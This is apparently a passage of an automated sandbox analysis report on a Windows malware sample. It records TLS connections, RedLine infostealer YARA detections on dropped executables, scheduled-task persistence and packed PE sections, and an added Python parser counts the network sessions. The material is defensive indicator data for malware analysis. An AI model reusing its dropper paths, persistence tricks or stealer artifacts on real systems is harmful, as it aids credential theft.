Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49843
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49842
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49841
Source: unknown Network traffic detected: HTTP traffic on port 49838 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49840
Source: unknown Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49844 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50143 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49840 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50555
Source: unknown Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49838
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49837
Source: unknown Network traffic detected: HTTP traffic on port 49847 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49878
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49833
Source: unknown Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49830
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49874
Source: unknown Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49923 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50555 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49843 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown Network traffic detected: HTTP traffic on port 49874 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49825 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown Network traffic detected: HTTP traffic on port 49938 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49827
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49826
Source: unknown Network traffic detected: HTTP traffic on port 49846 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49825
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown HTTPS traffic detected: 13.85.23.86:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.85.23.86:443 -> 192.168.2.5:49712 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.5:49766 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.5.15:443 -> 192.168.2.5:49767 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.5:49776 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.5:49777 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.5.15:443 -> 192.168.2.5:49780 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.5.15:443 -> 192.168.2.5:49782 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.126.29.15:443 -> 192.168.2.5:49801 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.126.29.15:443 -> 192.168.2.5:49806 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.5:49811 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.5.15:443 -> 192.168.2.5:49813 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.5:49825 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.5.15:443 -> 192.168.2.5:49827 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.126.29.15:443 -> 192.168.2.5:49840 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.5:49874 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.5.15:443 -> 192.168.2.5:49878 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.5:49923 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.5.15:443 -> 192.168.2.5:49925 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.189.173.25:443 -> 192.168.2.5:50555 version: TLS 1.2
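Read in isolation, the block of "HTTP traffic on port 49xxx -> 443" lines above looks like a scan, but every server port is 443: what the sandbox recorded is one client (192.168.2.5) opening a long series of short TLS sessions to five server IPs, most of them to 34.117.186.192 and 104.26.5.15. The Python below, an added example rather than anything from the report, parses a verbatim subset of these lines, counts sessions per server IP, applies the "many ports of the same IP" test the right way round (distinct server ports, not distinct client ports), and lists the :443 flows for which the report carries no TLS handshake line. The threshold of ten server ports is an arbitrary choice for the example.

```python
import re
from collections import defaultdict

# Input: a subset of the "Network traffic detected" / "HTTPS traffic detected"
# lines from this report, copied verbatim (the full set parses the same way).
REPORT_LINES = """\
Source: unknown Network traffic detected: HTTP traffic on port 49841 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown Network traffic detected: HTTP traffic on port 49925 -> 443
Source: unknown HTTPS traffic detected: 13.85.23.86:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.85.23.86:443 -> 192.168.2.5:49712 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.5:49766 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.5.15:443 -> 192.168.2.5:49767 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.5:49776 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.5:49777 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.126.29.15:443 -> 192.168.2.5:49801 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.5.15:443 -> 192.168.2.5:49925 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.189.173.25:443 -> 192.168.2.5:50555 version: TLS 1.2
"""

HTTPS_RE = re.compile(
    r"HTTPS traffic detected: (?P<sip>\d+\.\d+\.\d+\.\d+):(?P<sport>\d+) -> "
    r"(?P<cip>\d+\.\d+\.\d+\.\d+):(?P<cport>\d+) version: (?P<tls>.+?)\s*$"
)
PORT_RE = re.compile(r"HTTP traffic on port (?P<a>\d+) -> (?P<b>\d+)\s*$")


def parse_https_flows(text):
    """One dict per handshake line; the report prints the server end first."""
    flows = []
    for line in text.splitlines():
        m = HTTPS_RE.search(line)
        if m:
            flows.append({"server_ip": m.group("sip"), "server_port": int(m.group("sport")),
                          "client_ip": m.group("cip"), "client_port": int(m.group("cport")),
                          "tls": m.group("tls")})
    return flows


def parse_port_lines(text, service_port=443):
    """Ephemeral (non-service) port of every 'HTTP traffic on port A -> B' line,
    whichever direction the sandbox happened to print it in."""
    ports = set()
    for line in text.splitlines():
        m = PORT_RE.search(line)
        if not m:
            continue
        a, b = int(m.group("a")), int(m.group("b"))
        if service_port in (a, b):
            ports.add(b if a == service_port else a)
    return ports


def connections_per_server(flows):
    """Distinct client ports per server IP, i.e. how many separate TLS sessions each host saw."""
    by_server = defaultdict(set)
    for f in flows:
        by_server[f["server_ip"]].add(f["client_port"])
    return {ip: len(ports) for ip, ports in by_server.items()}


def port_scan_candidates(flows, min_distinct_ports=10):
    """'Connects to many ports of the same IP' means many *server* ports on one host.
    Dozens of client ports all going to :443 is reconnect churn and must not trip this."""
    by_server = defaultdict(set)
    for f in flows:
        by_server[f["server_ip"]].add(f["server_port"])
    return sorted(ip for ip, ports in by_server.items() if len(ports) >= min_distinct_ports)


def flows_without_handshake(text, service_port=443):
    """Client ports seen on a :443 flow for which the report records no TLS handshake,
    e.g. connections that were reset or never got past the TCP stage."""
    seen = {f["client_port"] for f in parse_https_flows(text) if f["server_port"] == service_port}
    return sorted(parse_port_lines(text, service_port) - seen)


if __name__ == "__main__":
    flows = parse_https_flows(REPORT_LINES)
    for ip, n in sorted(connections_per_server(flows).items(), key=lambda kv: -kv[1]):
        print(f"{ip:16} {n} TLS session(s)")
    print("port-scan candidates:", port_scan_candidates(flows))
    print("443 flows without a recorded handshake:", flows_without_handshake(REPORT_LINES))
```

On the subset above, port 49841 is a :443 flow with no handshake line, which matches the full report (no HTTPS line for 49841 exists there either); the port-scan check returns nothing because only one server port is ever contacted. The five server IPs are all public cloud/CDN addresses, so the session counts are a starting point for looking at the corresponding DNS and HTTP entries, not an attribution.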
Source: 831840b410.exe, 00000010.00000003.3086222866.0000000003789000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _WINAPI_GETRAWINPUTDATA memstr_3557b1e0-b

System Summary

Source: dump.pcap, type: PCAP Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 52.0.build12.exe.3c0000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 52.0.build12.exe.3c0000.0.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000034.00000000.3328661632.00000000003C2000.00000002.00000001.01000000.00000018.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe, type: DROPPED Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe, type: DROPPED Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\build12[1].exe, type: DROPPED Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\build12[1].exe, type: DROPPED Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe, type: DROPPED Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe, type: DROPPED Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 831840b410.exe, 00000010.00000002.3114626852.0000000000D62000.00000002.00000001.01000000.00000011.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_4225168b-d
Source: 831840b410.exe, 00000010.00000002.3114626852.0000000000D62000.00000002.00000001.01000000.00000011.sdmp String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_d6ec061c-0
Source: 831840b410.exe, 0000001F.00000000.2949970716.0000000000D62000.00000002.00000001.01000000.00000011.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_529da930-c
Source: 831840b410.exe, 0000001F.00000000.2949970716.0000000000D62000.00000002.00000001.01000000.00000011.sdmp String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_a690d9de-5
Source: 831840b410.exe, 0000002F.00000000.3200529574.0000000000D62000.00000002.00000001.01000000.00000011.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_8b2b90e1-e
Source: 831840b410.exe, 0000002F.00000000.3200529574.0000000000D62000.00000002.00000001.01000000.00000011.sdmp String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_8a9ef8f4-3
Source: SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Static PE information: section name:
Source: SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Static PE information: section name: .idata
Source: explorha.exe.0.dr Static PE information: section name:
Source: explorha.exe.0.dr Static PE information: section name: .idata
Source: amert[1].exe.6.dr Static PE information: section name:
Source: amert[1].exe.6.dr Static PE information: section name: .idata
Source: amert[1].exe.6.dr Static PE information: section name:
Source: amert.exe.6.dr Static PE information: section name:
Source: amert.exe.6.dr Static PE information: section name: .idata
Source: amert.exe.6.dr Static PE information: section name:
Source: random[1].exe0.6.dr Static PE information: section name:
Source: random[1].exe0.6.dr Static PE information: section name: .idata
Source: random[1].exe0.6.dr Static PE information: section name:
Source: c884f8452a.exe.6.dr Static PE information: section name:
Source: c884f8452a.exe.6.dr Static PE information: section name: .idata
Source: c884f8452a.exe.6.dr Static PE information: section name:
Source: sarra[1].exe.6.dr Static PE information: section name:
Source: sarra[1].exe.6.dr Static PE information: section name: .idata
Source: sarra[1].exe.6.dr Static PE information: section name:
Source: chrosha.exe.14.dr Static PE information: section name:
Source: chrosha.exe.14.dr Static PE information: section name: .idata
Source: chrosha.exe.14.dr Static PE information: section name:
Source: RageMP131.exe.20.dr Static PE information: section name:
Source: RageMP131.exe.20.dr Static PE information: section name: .idata
Source: RageMP131.exe.20.dr Static PE information: section name:
Source: MPGPH131.exe.20.dr Static PE information: section name:
Source: MPGPH131.exe.20.dr Static PE information: section name: .idata
Source: MPGPH131.exe.20.dr Static PE information: section name:
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process Stats: CPU usage > 49%
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe File created: C:\Windows\Tasks\explorha.job Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe File created: C:\Windows\Tasks\chrosha.job
Source: C:\Windows\System32\svchost.exe File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Code function: 0_2_00B85DC8 0_2_00B85DC8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Code function: 0_2_00BCA220 0_2_00BCA220
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Code function: 0_2_00B84E60 0_2_00B84E60
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 2_2_0074A220 2_2_0074A220
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 2_2_00744330 2_2_00744330
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 2_2_007394E3 2_2_007394E3
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 2_2_00748DBB 2_2_00748DBB
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 2_2_00704E60 2_2_00704E60
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 2_2_00748669 2_2_00748669
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 2_2_00748EDB 2_2_00748EDB
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 2_2_007447C8 2_2_007447C8
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 3_2_0074A220 3_2_0074A220
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 3_2_00744330 3_2_00744330
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 3_2_007394E3 3_2_007394E3
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 3_2_00748DBB 3_2_00748DBB
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 3_2_00704E60 3_2_00704E60
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 3_2_00748669 3_2_00748669
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 3_2_00748EDB 3_2_00748EDB
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 3_2_007447C8 3_2_007447C8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_00007FF848CC77F8 11_2_00007FF848CC77F8
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Code function: 14_2_003A6809 14_2_003A6809
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Code function: 14_2_003A707B 14_2_003A707B
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Code function: 14_2_003660E0 14_2_003660E0
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Code function: 14_2_003A24D0 14_2_003A24D0
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Code function: 14_2_003A2968 14_2_003A2968
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Code function: 14_2_0036CE00 14_2_0036CE00
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Code function: 14_2_003A7EB0 14_2_003A7EB0
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Code function: 14_2_00368310 14_2_00368310
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Code function: 14_2_003A6F5B 14_2_003A6F5B
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Code function: 14_2_00397780 14_2_00397780
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Code function: String function: 00B99750 appears 122 times
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: String function: 00719750 appears 244 times
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: String function: 0071F620 appears 36 times
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5596 -s 2132
Source: SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: dump.pcap, type: PCAP Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 52.0.build12.exe.3c0000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 52.0.build12.exe.3c0000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000034.00000000.3328661632.00000000003C2000.00000002.00000001.01000000.00000018.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe, type: DROPPED Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe, type: DROPPED Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\build12[1].exe, type: DROPPED Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\build12[1].exe, type: DROPPED Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe, type: DROPPED Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe, type: DROPPED Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Static PE information: Section: ZLIB complexity 0.9975808478552279
Source: explorha.exe.0.dr Static PE information: Section: ZLIB complexity 0.9975808478552279
Source: amert[1].exe.6.dr Static PE information: Section: ZLIB complexity 0.9977240444214877
Source: amert[1].exe.6.dr Static PE information: Section: fbupybke ZLIB complexity 0.9944582206191764
Source: amert.exe.6.dr Static PE information: Section: ZLIB complexity 0.9977240444214877
Source: amert.exe.6.dr Static PE information: Section: fbupybke ZLIB complexity 0.9944582206191764
Source: random[1].exe0.6.dr Static PE information: Section: ZLIB complexity 0.9915700285291631
Source: c884f8452a.exe.6.dr Static PE information: Section: ZLIB complexity 0.9915700285291631
Source: sarra[1].exe.6.dr Static PE information: Section: ZLIB complexity 0.9915469146238377
Source: chrosha.exe.14.dr Static PE information: Section: ZLIB complexity 0.9977240444214877
Source: chrosha.exe.14.dr Static PE information: Section: fbupybke ZLIB complexity 0.9944582206191764
